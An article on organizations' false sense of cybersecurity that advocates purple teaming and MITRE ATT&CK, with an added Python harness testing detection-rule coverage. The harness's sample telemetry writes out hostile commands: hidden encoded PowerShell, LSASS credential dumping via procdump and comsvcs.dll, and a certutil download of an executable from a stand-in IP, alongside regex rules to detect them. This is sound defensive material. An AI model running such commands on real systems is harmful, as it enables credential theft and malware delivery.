A study conducted in early 2021 by the independent research firm Sapio found an interesting cybersecurity paradox. An overwhelming majority (90 percent) of organizations say that their security posture has improved in the past two years. Yet almost the same proportion (86 percent) say they experienced at least one severe cyber attack in the past year, serious enough to require C-level or board meetings to address it.
It appears that either a false sense of security prevails among organizations, or their standard of what counts as secure is lacking. The disconnect between confidence in cybersecurity posture and actual outcomes when attacked is too conspicuous to ignore.
What can organizations do about this? Convincing decision-makers to invest more in cybersecurity is a challenge in itself. Now it seems that even when companies make the advised security expenditures, they may not be spending well, and the result is excessive confidence that feeds a false sense of security.
ADDRESSING THE INCREASING SOPHISTICATION OF ATTACKS
According to the study mentioned earlier, most respondents attribute security failures chiefly to the increased sophistication of attacks. They believe they are on the right track in improving their security but appear unable to keep pace with the evolution of attacks.
However, the study also reveals that even the typical or simple attacks manage to slip through. “Even unsophisticated attacks such as business email compromise and credential phishing continue to happen across industries and can cause as much damage as nation-state attacks,” a snippet of the study reads.
Two questions need answering: Does the organization have the right security controls? Are those controls delivering the desired outcomes? To arrive at sensible answers, organizations should consider expert advice and a dependable cybersecurity solution, both of which a security posture management platform with an advanced purple teaming framework can offer.
Having a comprehensive solution that thoroughly examines the state of an organization's cybersecurity is a crucial first step. Many organizations have little idea which security controls and measures to put in place, and most do not know how to perform effective security validation. If an organization cannot hire its own team of cybersecurity experts, it makes sense to turn to third-party security firms with the expertise and experience to ensure a decent level of protection.
HOW PURPLE TEAMING HELPS
Purple teaming is a form of security testing. It uses procedures and tactics that seek to reveal weaknesses in an organization's security so that they can be patched or strengthened. It verifies that security controls actually work and are not rendered futile by sophisticated and aggressive attacks. A control that exists on paper but is misconfigured, out of date, or alerting into a queue nobody reads fails that test just as a missing control does.
Purple teaming is more than simple security validation, though. It is a relatively new strategy, often regarded as the combination of red (attack) and blue (defense) teaming, but it is more nuanced than that. Purple teaming does not actually create a new team. It is a shift in mindset and approach rather than the fusion of two teams. Essentially, it fosters collaboration between the attack and defense teams so that they share insights and knowledge useful in improving both teams' efforts.
Jordan McMahon, corporate marketing officer at a renowned cybersecurity firm, has a succinct way of putting it. “Security teams today are shifting their mentality from a ‘siloed fortress’ approach to a holistic, threat-informed defense strategy enacted by ‘purple teams’ – collaborative entities formed by blending red and blue tactics,” McMahon says.
Siloing is one reason organizations end up with less-than-effective security controls. In particular, when organizations employ red and blue teams to stress-test their cyber defenses, the two usually work independently. That made sense originally, because the goal of such testing is to simulate what really happens: defenders set up their controls without knowing the attack, and attackers probe them without knowing the defenses.
However, cybersecurity professionals now broadly agree that some degree of collaboration between the attack and defense teams is better. The two do not have to work so closely that each knows everything the other is doing. Instead, they share insights into how an attack was prevented or how the security controls were bypassed, rather than leaving each other to figure it out alone.
By doing this, they speed up the improvement of their strategies, explore more of the possible attack surface and build on stronger defensive ideas. Ultimately, the organization benefits from broader and more in-depth security validation.
PURPLE TEAMING & THREAT INTELLIGENCE SHARING
Purple teaming is also often associated with the MITRE ATT&CK framework. Advanced cybersecurity platforms that include purple teaming modules often integrate the framework, a curated knowledge base of adversary tactics and techniques drawn from observed real-world intrusions, which gives the attack and defense teams a shared vocabulary for what to test and what to detect.
McMahon herself suggests leveraging MITRE ATT&CK to undertake purple teaming more systematically, with input from the latest information on cyber threats as observed globally. "This is an invaluable resource for purple teams to prioritize testing, investing, and planning as strategies evolve to meet new and existing threats," McMahon shares.
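To make the ATT&CK-driven workflow concrete, here is an added example (written for this page; it is not code from the article, from McMahon, or from any vendor's platform): a small Python harness in which the red side contributes attack cases tagged with the ATT&CK technique they exercise and the telemetry they leave behind, and the blue side contributes detection rules tagged with the technique each claims to cover. The technique IDs are real ATT&CK identifiers; the cases, the simplified key=value event lines, the rule IDs and the regex rules are constructed stand-ins. Running it shows the point this section makes: a technique can look covered on the ATT&CK matrix while a second tool for the same technique sails through.

```python
"""Minimal purple-team coverage check (added example, not from the article).

Red side: attack cases tagged with the MITRE ATT&CK technique they exercise,
each carrying the telemetry the action would leave behind.
Blue side: detection rules, each mapped to the technique it is meant to catch.
The harness replays the telemetry through the rules and reports, per technique,
what fired, what was only incidentally caught, and what slipped through.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class AttackCase:
    technique: str    # ATT&CK technique ID the red team is exercising
    name: str
    telemetry: tuple  # constructed process-event lines, one per event


@dataclass(frozen=True)
class DetectionRule:
    rule_id: str
    technique: str    # ATT&CK technique ID the blue team claims this rule covers
    pattern: re.Pattern


# Blue-side rules: constructed stand-ins for SIEM/EDR content (assumption, not real product rules).
RULES = (
    DetectionRule("R-001", "T1059.001",
                  re.compile(r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
    DetectionRule("R-002", "T1003.001", re.compile(r"procdump.*\blsass\b", re.I)),
    DetectionRule("R-003", "T1204.002",
                  re.compile(r"parent=(winword|excel|powerpnt)\.exe.*\bcmd=(cmd|powershell|wscript|cscript|mshta)\.exe", re.I)),
    DetectionRule("R-004", "T1105", re.compile(r"certutil(\.exe)?.*-urlcache", re.I)),
)

# Red-side cases: constructed telemetry in a simplified "key=value" event format.
CASES = (
    AttackCase("T1059.001", "encoded-powershell", (
        r"proc=powershell.exe parent=cmd.exe cmd=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
    )),
    AttackCase("T1003.001", "lsass-procdump", (
        r"proc=procdump64.exe parent=cmd.exe cmd=procdump64.exe -ma lsass.exe C:\temp\lsass.dmp",
    )),
    # Same technique, different tool: this is the variant purple teaming exists to find.
    AttackCase("T1003.001", "lsass-comsvcs", (
        r"proc=rundll32.exe parent=cmd.exe cmd=rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\l.dmp full",
    )),
    AttackCase("T1204.002", "macro-spawns-shell", (
        r"proc=WINWORD.EXE parent=explorer.exe cmd=WINWORD.EXE /n C:\Users\j\Downloads\invoice.docm",
        r"proc=cmd.exe parent=WINWORD.EXE cmd=cmd.exe /c certutil -urlcache -f http://198.51.100.7/a.exe a.exe",
    )),
)


def evaluate(cases=CASES, rules=RULES):
    """Replay each case's telemetry through every rule.

    A rule counts toward coverage only if it is mapped to the case's technique;
    rules mapped elsewhere that happen to fire are reported as 'incidental'
    (they caught something, but not the behaviour this case was testing).
    """
    results = {}
    for case in cases:
        fired = [r for r in rules if any(r.pattern.search(line) for line in case.telemetry)]
        results[case.name] = {
            "technique": case.technique,
            "matched": sorted(r.rule_id for r in fired if r.technique == case.technique),
            "incidental": sorted(r.rule_id for r in fired if r.technique != case.technique),
        }
    return results


def coverage_gaps(cases=CASES, rules=RULES):
    """Cases where no rule mapped to the exercised technique fired, grouped by technique."""
    gaps = {}
    for name, res in evaluate(cases, rules).items():
        if not res["matched"]:
            gaps.setdefault(res["technique"], []).append(name)
    return gaps


def technique_coverage(cases=CASES, rules=RULES):
    """Per technique: (cases detected by a correctly mapped rule, cases exercised)."""
    results = evaluate(cases, rules)
    totals = {}
    for case in cases:
        hit, total = totals.get(case.technique, (0, 0))
        totals[case.technique] = (hit + (1 if results[case.name]["matched"] else 0), total + 1)
    return totals


if __name__ == "__main__":
    for name, res in evaluate().items():
        status = "DETECTED" if res["matched"] else "MISSED"
        print(f"{res['technique']:<10} {name:<22} {status:<8} "
              f"matched={res['matched']} incidental={res['incidental']}")
    print("gaps:", coverage_gaps())
    print("coverage:", technique_coverage())
```

The report marks `lsass-comsvcs` as missed even though T1003.001 already has a rule, which is exactly the gap a siloed red team would quietly exploit and a siloed blue team would never learn about. A rule that fires but is mapped to a different technique (R-004 during the macro case) is listed separately, so the coverage numbers are not inflated by incidental hits; in a real exercise both sides would then agree on whether to add a rule for the comsvcs variant or to reclassify what R-004 actually covers.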
The spirit of threat intelligence sharing is highlighted in the Sapio study cited earlier. According to it, around two-thirds of organizations say they are more likely to share cybersecurity information with their peers because of the SolarWinds incident. They realize how important it is to tap into a reliable, up-to-date cyber threat intelligence resource to deal with attacks more effectively. Around half of the organizations surveyed also say that sharing threat information with the government helps improve security postures.
Organizations acknowledge the benefits of intelligence sharing. There is no logical excuse to withhold information, or to ignore a dependable and convenient resource like the ATT&CK framework.
COMPLIANCE IS NOT SECURITY
Regular readers of cybersecurity articles will likely see this phrase as a cliche. It is worth reiterating, however, in light of the false sense of security among organizations.
Adhering to the security guidelines and requirements imposed by regulatory bodies does not guarantee the protection of IT networks and assets. As Forbes Technology Council member Kerry Bailey put it, "A company can be 100 percent compliant and yet 100 percent owned by cybercriminals."
Bailey used Target as a convincing example. The major American retailer was certified compliant with the Payment Card Industry Data Security Standard (PCI DSS) in 2013. In that same year, Target suffered a major breach in which cybercriminals gained access to its point-of-sale systems.
Purple teaming is not a compliance requirement as such, but it is one of the best tools for ensuring that security controls are actually working, rather than being silent weaknesses that malicious actors are already exploiting.
ACHIEVING TRUE SECURITY
The solution to the problem of a false sense of security is security validation. Organizations cannot presume that their security controls will never become dysfunctional, even when supplied by a highly reputable security firm; controls drift through misconfiguration, unapplied updates and changes in the environment they protect. Purple teaming can help significantly here, especially for organizations that already do security testing through red teaming but continue to suffer cybersecurity setbacks.